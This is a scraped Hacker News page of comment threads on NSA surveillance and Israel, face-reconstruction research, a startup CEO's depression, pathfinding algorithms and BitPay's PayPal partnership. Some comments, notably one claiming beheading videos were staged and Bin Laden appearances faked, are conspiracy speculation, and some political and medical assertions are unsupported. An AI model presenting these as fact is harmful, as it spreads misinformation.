   In Moscow, Mr. Snowden told me that the document    reminded him of the F.B.I.s overreach during the days    of J. Edgar Hoover, when the bureau abused its powers to    monitor and harass political activists. Its much like    how the F.B.I. tried to use Martin Luther Kings    infidelity to talk him into killing himself, he said.    We said those kinds of things were inappropriate back    in the 60s. Why are we doing that now? Why are we    getting involved in this again?
... should be cut-and-pasted into any comment thread where a security-state apologist is trying to make people believe that Snowden is anything other than a patriot.

We can't fix this by working within the system. That's what the Church Committee tried to do. They failed. There is no reason to think their twenty-first century counterparts will not fail again.

jostmey 2 days ago 2 replies      
I think this is the most damning leak to date. There is no justification for freely giving information to Israel. And the part about people's porn habits being tracked is even scarier. That could be used to discredit virtually anyone (well, any male at least). Who hasn't visited an embarrassing porn website at least once in their life ? Now imagine your name being publicly associated with that website.
guelo 2 days ago 2 replies      
The way Israel owns American military and foreign policy should be a national shame. Reminds me of this other story about Israel going behind Obama's back to get weapons straight from the Pentagon. http://online.wsj.com/articles/u-s-sway-over-israel-on-gaza-...
rrggrr 2 days ago 0 replies      
This was not a one-sided trade. You can be sure the NSA received similar feeds from Israel on targets of great interest to US national interests. The inherent problem in these NSA debates is the inability of the NSA or policy makers to give the American people believable metrics that describe the value received for the effort. Could it be the US received important intel in return for its feeds? Yes. By not articulating a believable ROI on collection or sharing its looks increasingly like there wasn't one.
autism_hurts 2 days ago 2 replies      
Palantir has their hand in all of this.
BugBrother 2 days ago 0 replies      
A discussion of Unit 8200 I read today: http://strategypage.com/htmw/htintel/articles/20140923.aspx

(I read other sources because my Swedish media is like some inverse of Fox News. Stories like that Hamas had admitted murdering the three teens that started the last war is not... emphasized. The biggest morning newspaper didn't even mention that the accused murders of those teens died in a firefight today. Pallywood was never mentioned. Neither torture between Palestinian groups. Etc.)

javajosh 2 days ago 0 replies      
I think this all is going to take time to sink in, but in the end, Americans will do the right thing, which has been the overwhelming trend in the past. Think slavery. Think women's suffrage. Think civil rights. Think gay marriage.

This one is a little tough because the targets are unsympathetic and the anecdotes of specific harm are non-existent. It's difficult to argue against fighting dirty as a principle; it's much easier when you can point to a specific person (like MLK) and say, "That dude was clearly wronged."

I wish it was different. I wish people got more upset about government fighting dirty against anyone[1], even against the enemies that we ourselves agree are despicable and evil. Fighting dirty hurts us far more than it hurts them, because it damages our moral identity.

[1] The one exception is if there is an existential threat to the US. However, terrorism has never been, and will never be, an existential threat to the US[2] - except insofar as, in a fit of epic but unfunny irony, they manage to manipulate us into destroying our own moral fabric.

[2] The same argument applies to Israel. Israel playing dirty against state actors like Iran would be far more defensible, because Iran really could wipe Israel out.

not_that_noob 2 days ago 4 replies      
Why was the title changed? Here's the operative paragraph from the article below - there is a document that indicates the NSA is spying on porn visits of ordinary Americans to use against them in intimidation for exercising their rights to free speech. It doesn't get any worse than this.

"It should also trouble Americans that the N.S.A. could head down a similar path in this country. Indeed, there is some indication, from a top-secret 2012 document from Mr. Snowdens leaked files that I saw last year, that it already is. The document, from Gen. Keith B. Alexander, then the director of the N.S.A., notes that the agency had been compiling records of visits to pornographic websites and proposes using that information to damage the reputations of people whom the agency considers radicalizers not necessarily terrorists, but those attempting, through the use of incendiary speech, to radicalize others. (The Huffington Post has published a redacted version of the document.)"

[Edit] For reference, the original title was: "NSA spying on porn visits of ordinary Americans" - which is exactly what they seem to be doing.

rasz_pl 2 days ago 1 reply      
> it would first be minimized, meaning that names and other personally identifiable information would be removed.

minimized?? Im pretty sure he meant Anonymized

shna 2 days ago 0 replies      
Sounds like U.S. has not been a sovereign country for sometime. It's intelligence service has been working for another country, passing sensitive information of its own citizens to Israel. Interesting. Even more interesting is that the bulk of the comments are on somewhere else whether this is a witch hunt or not, if it resembles to what Mr. Hoover did or did not do, if the committee in the past succeeded or not.
ronreiter 2 days ago 2 replies      
The US is a close ally of Israel for obvious reasons. Israel wants to better defend itself, so it co-operates with the N.S.A. This is what Israel needs to defend itself, and Israel probably does the same thing to help defend the US.

There will always be a conflict between privacy and security, you can stick to one on expense of the other, but you will never be able to "fix" things.

bengrunfeld 2 days ago 3 replies      
Israel's Arab civilian's regularly attempt to blow themselves up in public places (believe me, I've stopped a few on them myself). Meanwhile the Palestinians gleefully lob rockets at populated cities in Israel. Of course Israel would want to monitor them as much as possible, and corroborate with the NSA to get as much data as possible. If that monitoring saved YOUR child from getting blown up on a bus, wouldn't you support it, or would you prefer your kid gets blown to smithereens so that social justice can be upheld? There's a big difference between America's domestic surveillance program and Israel's. Last time I checked, the central USA hadn't just recently been shelled.
Total Moving Face Reconstruction
308 points by mxfh  3 days ago   94 comments top 18
bsenftner 2 days ago 2 replies      
I run a startup specializing in this space called the 3D Avatar Store (www.3d-avatar-store.com).

3D Reconstruction of human faces is literally on the edge of mainstream. I'm betting on it, personally.

Our system is similar as theirs, but more general: we laser scanned 300,000 real people and then associated each laser scan with dozens of photos of that person taken from different angles, lighting conditions and expressions. That data set was then used for a neural net training - actually a pipeline of neural nets.

We can accept 1 photo and get back a good quality 3D model, or a series of photos and get better quality, or HD quality video and get back frame by frame, in expression reconstructions just like their solution. In fact, our system is able to recover 36 people per video feed in real time, as well as handle 4 video feeds at once. We don't need as much reference information as they do, because we trained our system to generally understand the human facial form, rather than their solution that operates in isolation for a single reconstruction operation.

Our current system is targeted as a WebAPI for games and serious simulations - enabling 3rd parties to implement "put yourself in the game" functionality. As such we have 3 different geometry outputs aimed at game/simulation developers. We also do facial recognition, and we have a special "forensic" output for that.

Our current "best output" is purposely "Pixar like" rather than realistic. Taking them realistic tends to freak people out - especially women (seems like our culture has trained women to have an idealized self image, and when presented with their non-mirror true form, they don't like it.)

You can learn more at these links:https://3d-avatar-store.com/Web-API-Features-May-2014https://3d-avatar-store.com/3D-Avatar-Creation-walkthruhttps://3d-avatar-store.com/New-Face-Finder

phkahler 2 days ago 2 replies      
I like that they show cases where it has problems. It's very much "here's what we can do, and here's where it doesn't work." There is no hype, no claims of "novelty", no speculation on uses, just results. I wish this were far more common.
hunvreus 3 days ago 2 replies      
Can't help but think of "The Running Man" watching Schwarzenegger's face being rendered in 3D.

It's terrifying to think that in the next 5 to 10 years we won't be able to distinguish a forged, high definition video of pretty much anybody.

anigbrowl 3 days ago 4 replies      
Somewhat off-topic, but I wonder why facial recognition/modeling experts seem to persistently ignore ears and jawline. As someone who works in film and does some picture editing (though it's not my primary skillset), ears are just as individual as other parts of the face, and they're one of the trickiest things for makeup artists to work on. As CG in movies and videogames keeps improving, my suspension of disbelief is often broken by noticing problems with the ears, eg watching a CG anime film and noticing that everyone has the same ear shape.
sabalaba 3 days ago 1 reply      
3D reconstruction is used in state-of-the-art facial recognition as well.[1] Essentially you reconstruct the face in 3D, rotate the 3D model to the front, project it back into 2 dimensions, and then feed it through a CNN with deep architecture. Because this gives you very good alignment, you can do tricks like not having shared weights across the entire image. That is, each section of the input vector is known to correspond to a certain part of the face and thus can learn unique parameters that are well suited for that specific region.

The paper claims that it takes about 105 seconds to render a single frame. So one second of 30 fps video would take about 52 minutes to render. I would have to read more in depth to see what kind of savings can be had by sharing information across frames. (The paper also doesn't mention the use of GPU acceleration.)

[1] https://www.facebook.com/publications/546316888800776/

daniel_reetz 3 days ago 2 replies      
I'd like to ask the authors how they managed to do such great/natural looking reconstructions of the eyes. Eyes are tough because they're naturally specular, transparent in places, and refractive.
macca321 2 days ago 2 replies      
I think I'm missing the point. Why are all the reconstructed videos from the same angle? It would demonstrate it better if they repositioned the camera.
Harshit15 2 days ago 0 replies      
This can help a lot in recreating the faces of avatars, in animated movies and games. They have tough time tracking facial details using small markers.I was wondering using shadow and shine removal to solve the issues shown in end. An example here is implemented by these autonomous car designers detailed as shadow correction:http://www.igvc.org/design/2013/US%20Naval%20Academy.pdf
imaginenore 3 days ago 4 replies      
This kind of advancements is one of the reasons I don't post photos of myself online. In a few years we will be capable of making videos with anybody's face replaced with anybody else's. It will be trivial to produce a fake video that can cause all kinds of legal troubles.

And yes, I realize it's even possible now, but with all the new algos and software coming out it will be easy enough for somebody to just mess with people's lives for fun.

aresant 3 days ago 0 replies      
Technology likes this makes me wonder how long of a shelf-life video "evidence" has.

Or perhaps these same algos will also provide utility in detecting / decoding "fakes", sort of like edge-tracking / error level analysis etc today.

tantalor 2 days ago 0 replies      
Tragic they removed the verbal audio from the demo video. It would have been much easier to judge the visual accuracy if the reconstructed lip motion were combined the original sound.
Aqwis 3 days ago 1 reply      
Very impressive. How large does the photo collection of the individual have to be to achieve results like those in the video?
SnowProblem 3 days ago 0 replies      
This will be huge for VR.
igriffer 2 days ago 0 replies      
Hi! Anybody have some sources? I want to touch this method =)This 3D reconstructions are the best material for the face recognition!
31reasons 2 days ago 0 replies      
This + Virtual Gesture Tracking + VR = Virtual Meetings
polskibus 2 days ago 0 replies      
The question that burns me is - when will we see this amazing algorithm implemented as part of OpenCV ?
debt 3 days ago 1 reply      
I've been increasingly interested in the Face. Human beings must have some incredible mental calculations going on when parsing a face. We're an evolved species that use the face as a form of communication.

I love the attached video in the link because it isolates perfectly the face. If you look closely you can see these tiny minute combinations within the face as each person talks; the eyes shifting, the face rotating, looking in various directions, the forehead crunching, the eyebrows raising, smiling, etc. All of these "cues" combine to create a message that we interpret instantly.

The face has inspired me lately to read more into this subject as it seems, at least on the surface, to be an extremely complex innate human ability; facial recognition.

Htsthbjig 2 days ago 0 replies      
Quite dangerous what this technology will mean in the future, they could manufacture evidence against you, publish it, and then let the masses lynch you.

I think this is what happened to the recent decapitation videos, they were reconstructed from home videos.

IMO the videos with the people dead in the floor are true, but the videos where they talk are staged.

Today we know there was a CIA team whose job was faking videos of Osama Bin laden:http://blog.washingtonpost.com/spy-talk/2010/05/cia_group_ha...

Remember Osama Bin Ladem appeared and disappeared according to US army interest at the time, finally ending in very strange circumstances(and being buried on the ocean, not letting anyone else interantionally to confirm(by DNA) he was Osama).

For me it is staged because current technology could synthesize a voice only if there are not strong emotions. The same happens with the voice.

With strong emotions it becomes very easy for familiars and friends to notice as people do specific gestures and most of them are not recorded in video.

That people are perfectly calm before dying I could understand, but that they do while saying exactly what their captors want I can't.

Also, before the videos most of the population in UK did not want to go to war, after the videos(with a UK native), most of them support war, quo prodis?

A Long, Ugly Year of Depression Thats Finally Fading
309 points by squiggy22  6 days ago   128 comments top 27
karmajunkie 6 days ago 0 replies      
Man, there are a lot of diagnoses getting thrown around this thread. As a caregiver to someone with a serious illness, as well as someone who periodically suffers from many of the same mental and emotional issues raised here... How about refraining from doing that unless you are A) a mental health or otherwise trained medical professional; and B) someone who has actually seen and assessed the patient. I'm not calling out anyone in particular because let's face it, this is HN and we're probably all know-it-alls at one time or another, but this can have some particularly pronounced thoughts and effects on the posters who are getting the comments.

If you are dealing with any of these issues, my heart goes out to you. Please reach out to a counselor, or at the very least a counselor or therapist who specializes in the things you're dealing with. If you need help finding one, my email is in my profile, i'm glad to help.

tst 6 days ago 4 replies      
I'm also recovering from a depression which lasted for quite a while. It absolutely sucks because you think you're worthless, nobody loves you, you can't get anything right and the best would be if you just wouldn't exist anymore.

And on top of that you isolate yourself. I know how hard it was to ask for help therefore I want to show you some things which helped me:

- Realize that your depression is lying to you. It doesn't tell the truth. It makes you believe that something is logical even if it isn't.

- Read 'Feeling Good' - terrible title, great book. It will probably work better than average on the average HN reader because it takes a 'rational' approach to depression (cognitive-behavioral therapy). It helps you to recognize destructive thought patterns and how to deal with them.

- Garbage in, garbage out. What works for computers also works for your body. Yeah, you're a geek but you can eat some vegs instead of the 500th pizza. Also working out (or other sports) are pretty great.

- Long term: Therapy which tries to work on the root cause and not just at symptoms.

Finally, here's a rather extensive list with lectures, books, exercises, etc. which help dealing with depression [1]. Back when I was fed up with feeling crap I created a spreadsheet with the 8 activities and tracked those every day.

Note: Every person seem to react to differently. I read about people who improved a lot by meditating - on the other hand, it didn't work for me.

So, try some things out and don't give up. You can beat that liar in your head.

[0]: http://www.amazon.com/Feeling-Good-The-Mood-Therapy/dp/03808...

[1]: http://www.reddit.com/r/getting_over_it/comments/1nd14u/the_...

PS: If you have any questions feel free to ask - if you want to send me a private one write at <username> @ panictank.net

dchuk 6 days ago 3 replies      
I guess I'll be the only person to comment on the actual Moz business struggles rather than the depression side of this post. Moz raised their money at a really tricky time because it was right before Google essentially bent over the SEO industry. When Rand mentions the Content tool that hasn't even started being developed, that was something that was supposed to take your Google Analytics keyword referrer data and match it to your content and your rankings and your links and your competitors and basically help you spot keywords and content you can easily rank better for.

The timeline seems to be matching up where they had this plan for this tool before any of the Google SSL stuff started, so as they started working on the design and UX of it, Google started rolling out the SSL stuff and it basically ruined their idea. Moz ended up adding tools to try and guess what keywords made up your "(not provided)" data but that's a far cry from what they were originally planning.

I'm basing this entirely on being heavily involved in the SEO industry around the times mentioned in Rand's article and having even run a successful SEO SaaS product (which is still going even though I've moved on to other projects). I just remember seeing screenshots of what they wanted to build and thinking "wow, if they can nail this, it will be great". I wanted to build a similar app. But when Google started hiding all organic keyword data in analytics, I distinctly remember saying "Well there goes Moz's whole new product".

Google really fucked the SEO world up with their (not provided) move. Think what you will about SEO but it's still a legitimate marketing channel and I really have never been able to understand why Google thinks it's ok to not share your organic keyword data but your paid keyword data is totally fine to share with site owners.

But not much anyone can do about that now I suppose.

jtbigwoo 6 days ago 0 replies      
>> ...layoffs is a Pandoras Box-type word at a startup. Dont use it unless youre really being transparent (and not just fearful and overly panicked as I was).

I made a similar mistake once as a manager and experienced this kind of thing more than once as an employee. Certain words like "layoffs" or "merger" are so loaded because employees know that you know more than they do. Even if you think you're being totally transparent, employees are correct to assume that you're holding some things back because you are. It's your job to understand the state and direction of the company and give your employees the information they need to do their jobs. Employees, especially the smart ones, are going to try to infer additional information from what you tell them even when you think you've told them everything they need to know. Leaders need to be aware that a certain amount of "Kremlinology" happens in every company.

He made things worse by being vague about the company's real situation and contradicting himself a couple sentences later when he said, "...we'll survive (though not with much headroom..." If he's talking about layoffs, who is this "we"? Everybody? Rand and Sarah? If you're going to be transparent, you also need to be specific and direct. A better approach might have been, "Sarah and I modeled out some worst-case scenarios last week and this stretches our break-even point an extra six months, which will constrain our growth."

astockwell 6 days ago 0 replies      
Speaking purely to the experiences of building a new software product, I've seen this exact story play out countless times. Everyone (except maybe the engineers themselves) seems to think that designing a software product is part of the "planning phase", and thus should happen before any time is "wasted" on development:

> "That product planning led to an immense series of wireframes and comps (visual designs of what the product would look like and how it would function) that numbered into the hundreds of screens..."

The biggest contributor to this I've seen is the dozens (hundreds? thousands?) of small ways that a design (done in a vacuum, without simultaneous prototyping) will differ from established development patterns, frameworks, and other pre-packaged solutions that engineers use daily to avoid reinventing every wheel. And engineers respond with timelines that expect to be able to leverage those frameworks. Thus the dissonance begins.

One example: a design calls for a form to be broken across 4 pages. There may be great aesthetic rationale or even user testing to support this, but that means that in all likelyhood any framework (e.g. Rails/Flask/Play/etc, not to mention native apps) will have to have additional modification to support sessions, changes to validation, changes to the auth domain, persistence changes, etc. And it's not necessary for an MVP. And many times these differences are much more subtle and deeply entrenched, and would require rethinking much of the wireframes/designs to align with development patterns. /rant

I'm not sure what the answer is here, except maybe that this is one more point in favor of having a "technical founder" or in general a technical person with decision-making authority, to avoid going down a road without proofing out your ideas or timelines.

Alex3917 6 days ago 0 replies      
> "the funny thing is, Marijuana doesnt have any pain-killing properties. It just lessens tension, anxiety, and stress for some people."

Marijuana is an analgesic. But in this case the effects are stemming from the fact that's its an anti inflammatory, so that the fluid in your disc is no longer compressing the spinal nerves. And the fact that it reduces anxiety also reduces inflammation even further, since anxiety is probably largely what was causing the inflammation.

johnyzee 6 days ago 0 replies      
I love it when CEO's own up like this, it's probably one of the most appealing traits in a leader I personally can think of. As long as they don't become too insecure to actually lead, introspection and self-criticism are strengths, not weaknesses. Besides, being aware of these traits and their negative repercussions put you in a pretty good place, the ones who really suffer are the guys who repress and deny the down slopes, always happy and bubbly on the outside but in reality inches from a mental breakdown.

The last part about how stress causes physical health problems is very important, and very overlooked. Besides the muscle and nervous tension the OP mentioned, stress seriously reduces immunity which can manifest itself in a myriad of unexpected ways (whichever subsystem fails first), from infections to cysts and all kinds of nastiness.

gadders 6 days ago 0 replies      
One last comment - this post from Rand reminds me of the following from Ben Horowitz:

"By far the most difficult skill for me to learn as CEO was the ability to manage my own psychology. Organizational design, process design, metrics, hiring and firing were all relatively straightforward skills to master compared to keeping my mind in check. Over the years, Ive spoken to hundreds of CEOs all with the same experience. Nonetheless, very few people talk about it and I have never read anything on the topic. Its like the fight club of management: The first rule of the CEO psychological meltdown is dont talk about the psychological meltdown."


mikeleeorg 6 days ago 0 replies      
This is an incredibly brave, and hopefully cathartic post by someone I greatly admire. I really hope he is able to find the support and peace he needs.

As a bit of an aside, I wonder how much of this has led to similar troubles for other founders:

When the Foundry investment closed, we redoubled our efforts to build Moz Analytics. We hired more aggressively (and briefly had a $12,000 referral bonus for engineers that ended up bringing in mostly wrong kinds of candidates along with creating some internal culture issues), and spent months planning the fine details of the product.

I've heard from friends & colleagues about the massive amount of pressure they've felt after closing an investment round. While fundraising is already an incredibly trying process, the next stage is sometimes even more difficult.

In contrast, other friends & colleagues who've opted for the bootstrapped route (either by choice or circumstance) haven't seemed to face a similar massive amount of pressure. Yes, they faced incredible stress too, but not to the level of those that have raised capital.

This is merely an anecdotal observation made in my peer group. I don't mean to imply that this is some kind of phenomenon. And clinical depression is something that can cut through any kind of circumstance.

I just can't help but notice the stark difference in stress level of founders who are growing organically & carefully vs founders who are in a mad recruiting rush and sometimes hire the wrong kind of people. I wonder how much of a relationship there is between having the right kind of people in your company vs the wrong kind of people, and the stress level of a founder. I would imagine a lot.

bocalogic 6 days ago 1 reply      
I respect Rand and give him a lot of credit for vocalizing his challenges. Depression is a challenge and it can be overcome.

I am not a doctor, but I can tell you that a lot of my peers are suffering from depression from business, marriage or just in general.

One thing I do know is that the world has changed a lot in the past decade. The price of everything just keeps going up and we are constantly bombarded by information. Humans are not built that way. There is no badge of honor for being under stress 24/7. It will catch up to you one way or the other.

Humans suffer from the fight or flight responses that we encounter during high stress situations. The challenge is to digest it and make decisions not based on fight or flight emotions.

The body produces cortisol when we are under duress and it is horrible for you. It screws up everything with your body and your mind. One way to counteract this is by working out, getting sunlight, eating the right foods and staying off caffeine. Try some black or green tea instead.

30 minutes of working out will combat cortisol production for about six hours. Even going for a walk helps a lot.

Most of the worlds brightest minds and most successful people suffer from depression and knowing that your ARE NOT ALONE is a huge step forward.

You can beat depression and your life will turn around!

Talking about it and seeking help is definitely a step in the right direction. Keep your chins up.

raheemm 6 days ago 0 replies      
So few people and places can allow for this level of vulnerability and authenticity. This post is going to help a lot of people.

I have even more respect for Rand and Moz. We can say Fail Fast, Fail this, fail that ... but this kind of writing is the true embrace of failure, learning, wisdom, humanity.

gadders 6 days ago 4 replies      
I admire what Moz has done and it was an interesting read.

My comment is more of a meta one about HN. Are we really that interested in these stories of depression? We seem to get at least one a week. I realise it's an issue that may affect people here, but I'm not sure if we need the volume we are seeing now.

jroseattle 5 days ago 0 replies      
I read through this and the Can't Sleep/Loop post, which had me wiping my eyes. I feel I'm there, right now.

We're in the middle of raising money, while I also keep the engineering ship moving forward with product releases. We're about to run out of initial seed money, as we were supposed to have brought in the balance of the round and been on to Series A at this point. It's challenging, but I feel like I'm handling it.

Or so I thought. It turns out, I'm getting little sleep right now -- maybe 4-5 hours a night, on average. I've gained back so much weight and I abhor seeing myself in photos. I watch colleagues take absurd plans to investors and get way overfunded, more than they were ever asking to take on, while our little operation that's actually generating revenue (we will likely be break-even in 6 months) gets passed. I know it's not a rational reaction, but still the mental headwinds it creates really sap my soul.

It sucks when you're a (very) logical being, and something in your head no longer fits into place. I'm short with my kids at home, and I literally dread downtime. I find that cocktails go down easy, really easy.

It's a loop, alright.

danielweber 6 days ago 1 reply      
Slightly OT, but I read the whole thing thinking Moz was a nickname for Mozilla, or, at the least, that Moz was related to Mozilla.

It's still good to get these stories.

swombat 6 days ago 9 replies      
Forgive my ignorance and bluntness, but reading the above, it sounds more like an anxiety disorder than like depression. Both are serious, but I'm not sure if it helps to confuse the two?

I've not experienced either seriously, but I know people who have. Depression seems to be more about things not mattering anymore, everything being pointless, the world seeming drab and just not fun anymore, rather than feeling that everything is going to go to shit. Anxiety, though, (and I'm speaking from experience here, having had some light anxiety attacks caused by too much regular caffeine usage) seems to be characterised by a feeling of impending doom, that everything is wrong, it can't be fixed, it's all hopeless, etc. But in my (mild) anxiety attacks, like Rand, I still cared about the outcome. I just felt like there were too many problems to solve, overwhelmed, ready to say "fuck this", give up the entire thing, and start again from scratch with something completely different.

PS: Otherwise, props for the very honest and open article. Running a business is a lot of responsibility and very stressful and it can be comforting to know you're not the only who seems surrounded by world-ending scenarios.

karl24 6 days ago 0 replies      
Mental illness impacts more people than cancer, diabetes, or heart disease. Unfortunately only 1/3 of people who have the illness get treatment due to cost, access, stigma, etc.

We're working on an app that uses technology to help bring clinically proven treatments to market at a price point that dramatically improve access. We are pairing this with product design that's common on the consumer web but uncommon in mental health apps to help with adherence and engagement with treatment.

I hope this isn't perceived as attempting to capitalize on a serious thread. We (the founders) have incredibly personal reasons for perusing this problem. Many in this thread are likely ideal early adopters for the product. The general awareness that this discussion is raising is a good opportunity to reach out and ask for help as helping us will ultimately help many others.

Two ways to help:

(1) 7 question survey, < 1 min to complete: http://bit.ly/1plE2Rg

(2) contact us directly via cbtmobileapp@gmail.com if you'd like to provide insight via a more in-depth interview.

marklittlewood 6 days ago 0 replies      
Depression in technology is a very common condition. If you suffer from it, please know you ARE NOT ALONE. This talk is very honest, open and has some really helpful and practical advice.


akrymski 5 days ago 0 replies      
I've been through this at every startup I founded, but managed to pull through in the end - and I'm still hoping this startup won't be any different. I struggle to imagine if any CEO has not had a tough time like this and felt utterly depressed at least once when things weren't working out. Rather than focus on the depression aspect however, why not discuss what COULD have been done better, and what Rand and other CEOs can learn from this - because ultimately there's an important lesson there besides "depression sucks":

- Don't bet your whole business on one product. Products come and go, businesses pivot. Remember how Steve Jobs launched the Mac? He created a separate, small division for the Macintosh to directly compete with the rest of the company (working on Lisa - which wasn't going well actaully). That's genius. He knew Mac is a risky project that could well take much longer than anticipated. He didn't bet the whole house.

- Start as small as possible. Moz Analytics was meant to be this giant swiss army knife right? Wrong. MVP lessons still apply. Couldn't you have launched the new brand with a tiny set of core features? Broke it into a modular setup where consumers could pay for features/modules in the future as you develop them?

- Iterate. Real artists ship, remember? Agile software development and all that? Doesn't sound like you had clearly defined iterative goals that you were hitting as you went, because then you'd really have an idea for where you are in the software development process. You seemed to have to go on someone's word on this. Instead you should have been producing A product every month with an increasing set of features. That way you could have still launched on time, but with less features.

- Review your progress often, and don't loose sight of the grand mission. Being smart doesn't help here - it often makes you stubborn, and I've got the same issue. But sometimes you need to have that thc-truffle, take a step back and think how else you could allocate your resources. Are there some other opportunities that the business can simultaneously pursue with a small set of resources as a backup plan? Are there some major M&A deals that can be done to shuffle things around? Do we need to hire more staff / or let people go who aren't hitting the deadlines? Drastic times call for drastic measures. The biggest issue with depression is that deep inside you still expect things to just get better on their own. And as they don't, you feel worse. Well the bad news is they won't get better on their own. You have to do something about it.

- Don't fail to communicate. The value of your business is in its passionate community, not one product. Seems like there are lots of people passionate about SeoMoz. Instead of shutting yourself out due to what appeared to you as a product failure, perhaps you could have engaged the community in the process, help you establish the product roadmap for the features you should be rolling out first, and try to understand why 90k of sign ups failed to try out the product.

ryanobjc 6 days ago 2 replies      
We talk a lot about successes.

It's also good to talk about failures, both partial and more complete.

And redemption.

The road to victory is long, and I would put my back against Rand because I know this struggle has made him better.

autism_hurts 6 days ago 2 replies      
I cannot stress how much exercising to exhaustion daily (read: Crossfit) and eating healthy (Slow Carb / Paleo) impacted my depression.

Please try them before you medicate.

austengary 6 days ago 0 replies      
Not an overnight fix. But with sustained effort, meditation changed my life. Eventually other things fell in place. Diet, exercise, relationships, mental health. Buddhist teachings really helped too.

I started here. http://headspace.com

DanBC 6 days ago 0 replies      
Here's what the English "National Institute for Health and Care Excellence" say: https://www.nice.org.uk/guidance/CG90
l33tbro 6 days ago 1 reply      
As somebody who is not depressed, it is always confronting to see just how hard depressed people are on themselves.
x0x0 6 days ago 0 replies      
Wow, props to Rand for sharing this.

Rand, if you're reading this, two things occur:1 - you're far from the first person to go for big-bang software releases (though listening to your cto is probably a good idea)

2 - in _Fooled By Randomness_ by Taleb (I believe, I could be misremembering) he describes the incredible level of stress that monitoring his investments daily created. I seem to recall the author writing that he simply was unable to monitor them every day and instead had to only look at some periodic summaries. Perhaps this may help people who get to mentally exhausted looking at numbers daily? I mean, it's good to notice immediately if they crater, though that can be scripted. Beyond that, there's probably not much value looking at them 7 days a week that you don't get looking at them once every seven days. I use the same technique on the elliptical machine; time crawls if I look at the timer, so it's an exercise of will to go as long as possible before looking.

Hope he's in a better place now.

andreash 6 days ago 0 replies      
One of the most honest blog post I've ever read.
Siecje 6 days ago 0 replies      
thinknothing 6 days ago 0 replies      
I started writing poetry when i got depressed - www.thinknothing.co
332 points by WestCoastJustin  3 days ago   25 comments top 13
reitzensteinm 3 days ago 2 replies      
One trick I've used quite a bit in games I've written is to do a breadth-first search of the entire playfield, with no termination, resulting in data for how to get from any tile to the destination.

This has a few nice advantages:

* Breadth first is trivially broken up to iterate over multiple frames, amortizing the cost of visiting each tile

* It reduces the worst case as the number of enemies scales up but the destination counts are low.

* The implementation in general is very simple

* You can still early terminate if you keep track of the farthest distance a pathfinding layer needs to satisfy.

* No pathological, worst case situations where a playfield becomes very expensive to pathfind. An open field is the worst case.

I first used this in Robokill, a flash game which often had 20+ enemies on the same screen tracking the player. I estimated at the time that it cost about as much as doing A* on ~5 enemies.

In games, the worst (common) case is basically all that matters - a constant 60fps is significantly better than 100fps dropping to 30fps occasionally.

curiousAl 3 days ago 0 replies      
Wow, this is a fantastic visualization of algorithms with scary doctoral-thesis-y names.I love visualizations that make scary things simple.
tokenizerrr 3 days ago 1 reply      
Very nice. If the author is the submitter or sees this, could you please provide some details on what kind of libraries and techniques have gone into creating this? A blog post or something would be great.
newbrict 3 days ago 1 reply      
The recursive visualization is really slow on even moderately complex graphs, otherwise it's a really neat tool
noiv 3 days ago 0 replies      
The above pathfinder is much faster with a binary heap, https://github.com/bgrins/javascript-astar and can be heavily optimized if you know your engine. With SpiderMonkey I get fixed cost of around 1ms for initialization and it checks nearly 2000 nodes in 1ms on a 3Ghz Core Duo with a relative costly euclidean heuristic. So worst case on a 40x50 map is ~2ms. If worst case can be avoided upfront you'll always get a response within 2ms even with a 2000 nodes long path on most maps. It is amazing what one can do with JS nowadays.
jMyles 3 days ago 2 replies      
In my first bit of play, I just tried to find cases where Manhattan lost to the others. It seems like Manhattan is not as good when faced with a plausible path only to be thwarted at the end - is this right?

Can you show a few cases where Manhattan loses by a landslide?

tejon 3 days ago 0 replies      
Of course it's a gray link... but wow, major enhancements since ~1 year ago when I was on my pathfinding binge. Good stuff! Never did implement full jump-point optimization, though I got halfway there by manipulating queue priorities.
iandanforth 3 days ago 1 reply      
None of these appear to work in an intuitive fashion. Are there algorithms that better resemble biological strategies? If I create a large walled area, I expect an entity to explore in one direction with a preference with external walls, miss areas and completely fail sometimes.

Here's a cute and furry demonstration of biological pathfinding: https://www.youtube.com/watch?v=HRd5WYrnML4

muhuk 3 days ago 0 replies      
In case you miss the tiny link, here's the source: https://github.com/qiao/PathFinding.js
diziet 3 days ago 0 replies      
For a similar problem, check out http://www.pathery.com/ - create the longest possible maze with X blocks.
jokoon 3 days ago 0 replies      
I recently implemented A* with the help of this website, which really explains it well.


I also used a method to create discrete path between cells, to straighten the path when possible.

poseid 3 days ago 1 reply      
I wonder if something like this could be used to automatically place components in an electrical circuit (PCB)
jwklemm 3 days ago 0 replies      
Really useful library and great visualizations. I'm having flashbacks to my CS algorithm analysis class.
BitPay and PayPal
308 points by seansoutpost  2 days ago   147 comments top 11
trevordev 2 days ago 6 replies      
BitPay sponsored angel-hack Seattle that I participated in this summer. Their developer api was horrible and poorly documented wasting everyone time. I was in one of the few groups that got it to work. When asking when we would find out who won the 5 bitcoin prize for best use of it we were told to contact bitpay. I contacted them multiple times and support told me to to contact their CEO who ended up not responding to my emails. I will not use bitpay in the future.
andrewljohnson 2 days ago 4 replies      
rcraft 2 days ago 6 replies      
Is paypal just ignoring the IRS' recent guidelines that bitcoin is treated as property?

From http://www.bloomberg.com/news/2014-03-25/bitcoin-is-property...:

Todays IRS guidance will provide certainty for Bitcoin investors, along with income-tax liability that wasnt specified before. Purchasing a $2 cup of coffee with Bitcoins bought for $1 would trigger $1 in capital gains for the coffee drinker and $2 of gross income for the coffee shop.

Its challenging if you have to think about capital gains before you buy a cup of coffee, he said.

canvia 2 days ago 0 replies      
It wasn't just BitPay, also Coinbase and GoCoin: https://www.paypal-community.com/t5/PayPal-Forward/PayPal-an...
highercenter 2 days ago 0 replies      
More choices in how people create value, share it, buy, sell and trade it thats exactly what PayPal is all about, said Scott Ellison, Senior Director, Strategy, PayPal.

That's amazing! And me thinking PayPal was all about our money!

earthmeLon 1 day ago 0 replies      
Hmmmm... I thought that a large reason many people helped develop bitcoin and it's community was to thwart Paypal, its highly-politically-motivated nature, and others like it.
appleflaxen 2 days ago 0 replies      
Nothing could make me less interested in BitPay. PayPal is just such a negative connotation in my mind that it turns me off of a business partner just to know they are collaborating.
jtwebman 1 day ago 0 replies      
What do you guys think of Coinbase? Is it a good replacement for BitPay? Sorry I am new to this are but wanted to start accepting Bitcoins
ssteinb 2 days ago 1 reply      
Paypal is going to acquire the shit out of them. Calling it now.
Everhusk 2 days ago 0 replies      
This is really big news for bitcoin, BTC-e is taking off.
SuddsMcDuff 2 days ago 1 reply      
Looks like winkdex.com has gone down under the load
Bash 'shellshock' bug is wormable
290 points by jgannonjr  1 day ago   132 comments top 24
